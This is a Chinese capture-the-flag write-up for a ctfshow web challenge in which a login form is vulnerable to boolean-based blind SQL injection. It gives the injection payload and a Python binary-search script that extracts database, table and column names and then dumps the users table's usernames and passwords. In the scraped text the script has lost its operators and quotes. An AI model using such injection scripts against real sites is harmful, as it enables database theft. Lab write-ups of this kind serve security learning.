ctfshow——web WAF绕过 WAF绕过 wp进入页面一个登入框经过测试没有弱口令爆破抓包测试发现存在布尔盲注逻辑为真时逻辑为假时构造payloaduserNameadminpassWord1or(ascii(substr((select(database())),1,1))100)#脚本如下二分法#-*-coding:utf-8-*- import requests import time host http://e3599346-f189-47c3-9e85-1d7ff4fee612.challenge.ctf.show/login.php def getDatabase(): #获取数据库名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: usernameadmin password1or(ascii(substr((select(database())),%d,1))%d)# % (i,mid) param {userName:username,passWord:password} res requests.post(host,dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(database is - ans) def getTable(): #获取表名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)database()),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(table is - ans) def getColumn(): #获取列名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)\users\),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(column is - ans) def dumpTable():#脱裤 global host ans for i in range(1,10000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(username,0x3a,password))from(users)),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(dumpTable is - ans) dumpTable()运行结果flagCTF{bool_sql_injection_bypass_is_fun}

相关新闻

最新新闻

PHP 文件包含漏洞实战:HCTF 2018 WarmUp 代码审计与3种Payload构造解析

PHP 文件包含漏洞实战:HCTF 2018 WarmUp 代码审计与3种Payload构造解析

PHP文件包含漏洞深度解析:从HCTF 2018 WarmUp看白名单绕过艺术漏洞背景与场景还原2018年HCTF竞赛中的WarmUp题目成为了PHP文件包含漏洞的经典教学案例。这道题看似简单的笑脸页面背后,隐藏着对PHP文件包含机制和安全校验逻辑的深度考验。题目通过一个精心…

2026/7/7 19:28:03
如何用Universal x86 Tuning Utility解锁你的处理器隐藏性能?

如何用Universal x86 Tuning Utility解锁你的处理器隐藏性能?

如何用Universal x86 Tuning Utility解锁你的处理器隐藏性能? 【免费下载链接】Universal-x86-Tuning-Utility Your Hardware. Your Rules. Open. Powerful. Unrestricted Tuning. 项目地址: https://gitcode.com/gh_mirrors/un/Universal-x86-Tuning-Utility …

2026/7/7 19:28:03
Windows右键菜单终极清理指南:3步解决菜单臃肿与响应缓慢问题

Windows右键菜单终极清理指南:3步解决菜单臃肿与响应缓慢问题

Windows右键菜单终极清理指南:3步解决菜单臃肿与响应缓慢问题 【免费下载链接】ContextMenuManager 🖱️ 纯粹的Windows右键菜单管理程序 项目地址: https://gitcode.com/gh_mirrors/co/ContextMenuManager Windows右键菜单管理工具ContextMenuMa…

2026/7/7 19:28:03
Windows右键菜单管理:从混乱到秩序的终极解决方案

Windows右键菜单管理:从混乱到秩序的终极解决方案

Windows右键菜单管理:从混乱到秩序的终极解决方案 【免费下载链接】ContextMenuManager 🖱️ 纯粹的Windows右键菜单管理程序 项目地址: https://gitcode.com/gh_mirrors/co/ContextMenuManager 你是否曾经在Windows中右键点击一个文件&#xff0…

2026/7/7 19:28:03
如何永久保存微信聊天记录:WeChatMsg终极免费备份方案

如何永久保存微信聊天记录:WeChatMsg终极免费备份方案

如何永久保存微信聊天记录:WeChatMsg终极免费备份方案 【免费下载链接】WeChatMsg 提取微信聊天记录,将其导出成HTML、Word、CSV文档永久保存,对聊天记录进行分析生成年度聊天报告 项目地址: https://gitcode.com/GitHub_Trending/we/WeCha…

2026/7/7 19:28:03
OpenEuler/compat-winapp进阶技巧:提升Windows软件运行性能的7个实用方法

OpenEuler/compat-winapp进阶技巧:提升Windows软件运行性能的7个实用方法

OpenEuler/compat-winapp进阶技巧:提升Windows软件运行性能的7个实用方法 【免费下载链接】compat-winapp Issue report and discussion entry repo for compat-winapp SIG 项目地址: https://gitcode.com/openeuler/compat-winapp 前往项目官网免费下载&…

2026/7/7 19:23:03

月新闻